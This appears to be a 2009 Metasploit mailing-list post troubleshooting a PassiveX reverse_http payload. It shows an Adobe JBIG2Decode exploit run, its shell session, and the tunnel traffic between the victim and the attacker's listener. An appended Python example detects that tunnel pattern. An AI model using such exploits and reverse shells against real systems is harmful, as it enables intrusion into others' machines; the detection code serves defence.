Metasploit mailing list archives
problem with passiveX (reverse_http) payloads: nothing in return to commands
From: irian2003 at yahoo.com (Bogdan Sandu)
Date: Fri, 3 Apr 2009 14:53:28 -0700 (PDT)
Hello,

I have a problem with the reverse_http payloads. The exploit succeeds, and looking with tcpdump at the traffic between the proxy server and the port of the payload I see the commands being executed, but after interacting with the session I see nothing returned to my commands:

----------------------------
GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive

HTTP/1.1 200 OK
Content-Length: 4
Server: Rex
Connection: close

Dir
------------------------------------
GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive
-----------------------------------
POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Content-Length: 1024
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive

dir
Volume in drive C has no label.
Volume Serial Number is 0CAA-3013

Directory of C:\Documents and Settings\irian\Desktop

04/03/2009 11:43 PM <DIR> .
04/03/2009 11:43 PM <DIR> ..
04/01/2009 10:09 AM 27,136 Activ.doc
02/27/2009 12:09 PM 169,984 carte optional.doc
03/07/2009 12:48 PM 131 jboss.txt
04/02/2009 03:48 AM 288,237 lo.cap
03/30/2009 12:17 PHTTP/1.1 200 OK
Content-Length: 0
Server: Rex
Connection: Keep-Alive
-----------------------------
POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Content-Length: 230
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive

M 247,666 users_guide.pdf
03/25/2009 10:32 PM 24,064 youtube.doc
15 File(s) 2,111,721 bytes
3 Dir(s) 959,123,456 bytes free

C:\Documents and Settings\irian\Desktop>HTTP/1.1 200 OK
Content-Length: 0
Server: Rex
Connection: Keep-Alive
----------------------------------------
msf exploit(adobe_jbig2decode) > exploit
[*] Exploit running as background job.
msf exploit(adobe_jbig2decode) >
[*] PassiveX listener started.
[*] Using URL: http://0.0.0.0:8080/carti.pdf
[*] Local IP: http://1.2.3.4:8080/carti.pdf
[*] Server started.
[*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 1.2.3.4:50007...
[*] Sending PassiveX main page to client
[*] Sending PassiveX main page to client
[*] Command shell session 1 opened (Local Pipe -> Remote Pipe)
[*] Sending stage to sid 2 (474 bytes)
msf exploit(adobe_jbig2decode) > sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  Local Pipe -> Remote Pipe

msf exploit(adobe_jbig2decode) > sessions -i 1
[*] Starting interaction with 1...

ls
dir
dir

Any ideas why this is happening? Thanks a lot and keep up doing a great job.

Bogdan
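The capture in the post shows what this payload's traffic looks like at a proxy: GET requests polling a `/tunnel_out` path and POST requests to `/tunnel_in` under the same path prefix, each carrying an `X-Sid: sid=N` header. As an added example (not part of the original post and not Metasploit code), a defender could flag that pattern in captured HTTP requests as follows; the function names and the sample requests are constructed for illustration.

```python
import re
from collections import defaultdict

# Request line shape seen in the capture: METHOD /<token>/tunnel_in|tunnel_out HTTP/1.x
REQ_RE = re.compile(r"^(GET|POST) /([^/\s]+)/(tunnel_in|tunnel_out) HTTP/1\.[01]$")
SID_RE = re.compile(r"^sid=\d+$")

def parse_request(raw):
    """Split a raw HTTP request head into (request_line, lowercase header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def find_tunnels(raw_requests):
    """Return {(token, sid): set of directions} for requests matching the pattern."""
    seen = defaultdict(set)
    for raw in raw_requests:
        req_line, headers = parse_request(raw)
        m = REQ_RE.match(req_line)
        sid = headers.get("x-sid", "")
        if not m or not SID_RE.match(sid):
            continue
        method, token, direction = m.groups()
        # In the capture, tunnel_out is polled with GET and tunnel_in receives POSTs.
        if (method, direction) in {("GET", "tunnel_out"), ("POST", "tunnel_in")}:
            seen[(token, sid)].add(direction)
    return dict(seen)

def bidirectional(tunnels):
    """Keep only sessions where both directions were observed."""
    return sorted(k for k, d in tunnels.items() if d == {"tunnel_in", "tunnel_out"})

# Constructed sample requests (token and hosts are made up for this example).
SAMPLE = [
    "GET /EXAMPLETOKEN0001/tunnel_out HTTP/1.0\r\nX-Sid: sid=2\r\nHost: 192.0.2.10:8081\r\n\r\n",
    "POST /EXAMPLETOKEN0001/tunnel_in HTTP/1.0\r\nX-Sid: sid=2\r\nContent-Length: 3\r\n\r\ndir",
    "GET /docs/tunnel_out HTTP/1.1\r\nHost: intranet.example\r\n\r\n",  # no X-Sid: ignored
    "GET /index.html HTTP/1.1\r\nHost: intranet.example\r\n\r\n",
]

if __name__ == "__main__":
    for token, sid in bidirectional(find_tunnels(SAMPLE)):
        print(f"possible HTTP tunnel session: path token={token} {sid}")
```

Requiring both directions for the same path token and session id keeps an unrelated URL that happens to end in `tunnel_out` from raising an alert on its own.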